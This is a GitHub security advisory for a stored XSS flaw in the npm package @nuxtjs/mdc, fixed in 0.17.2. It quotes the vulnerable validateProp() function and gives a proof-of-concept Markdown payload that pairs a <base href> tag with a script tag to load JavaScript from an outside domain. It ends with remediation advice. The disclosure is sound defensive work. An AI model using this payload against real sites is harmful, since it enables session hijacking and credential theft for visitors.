GHSA-cj6r-rrr9-fg82

Suggest an improvement
Source
https://github.com/advisories/GHSA-cj6r-rrr9-fg82
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-cj6r-rrr9-fg82/GHSA-cj6r-rrr9-fg82.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-cj6r-rrr9-fg82
Aliases
Related
Published
2025-07-20T16:36:14Z
Modified
2025-07-20T16:36:14Z
Severity
  • 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L CVSS Calculator
Summary
Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering
Details

Summary

A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a <base href="https://attacker.tld"> element.
The <base> tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.

Details

  • Affected file : src/runtime/parser/utils/props.ts
  • Core logic  : validateProp() inspects
    • attributes that start with on → blocked
    • href or src → filtered by isAnchorLinkAllowed()
      Every other attribute and every tag (including <base>) is allowed unchanged, so the malicious href on <base> is never validated.
export const validateProp = (attribute: string, value: string) => {
  if (attribute.startsWith('on')) return false
  if (attribute === 'href' || attribute === 'src') {
    return isAnchorLinkAllowed(value)
  }
  return true               // ← “href” on <base> not checked
}

As soon as <base href="https://vozec.fr"> is parsed, any later relative path—/script.js, ../img.png, etc.—is fetched from the attacker’s domain.

Proof of Concept

Place the following in any Markdown handled by Nuxt MDC:

<base href="https://vozec.fr">


<script src="/xss.js"></script>
  1. Start the Nuxt app (npm run dev).
  2. Visit the page.
  3. The browser requests https://vozec.fr/xss.js, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).

Impact

  • Type: Stored XSS via remote script inclusion
  • Affected apps: Any Nuxt project using @nuxtjs/mdc to render user-controlled Markdown (blogs, CMSs, docs, comments…).
  • Consequences: Full takeover of visitor sessions, credential theft, defacement, phishing, CSRF, or any action executable via injected scripts.

Recommendations

  1. Disallow or sanitize <base> tags in the renderer. The safest fix is to strip them entirely.
  2. Alternatively, restrict href on <base> to same-origin URLs and refuse protocols like http:, https:, data:, etc. that do not match the current site origin.
  3. Publish a patched release and document the security fix.
  4. Until patched, disable raw HTML in Markdown or use an external sanitizer (e.g., DOMPurify) with FORBID_TAGS: ['base'].
Database specific 
{
    "cwe_ids": [
        "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-20T16:36:14Z",
    "nvd_published_at": "2025-07-18T16:15:30Z",
    "severity": "HIGH"
}
References

Affected packages

npm / @nuxtjs/mdc

Package

Name
@nuxtjs/mdc
View open source insights on deps.dev
Purl
pkg:npm/%40nuxtjs/mdc

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.17.2

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-cj6r-rrr9-fg82/GHSA-cj6r-rrr9-fg82.json"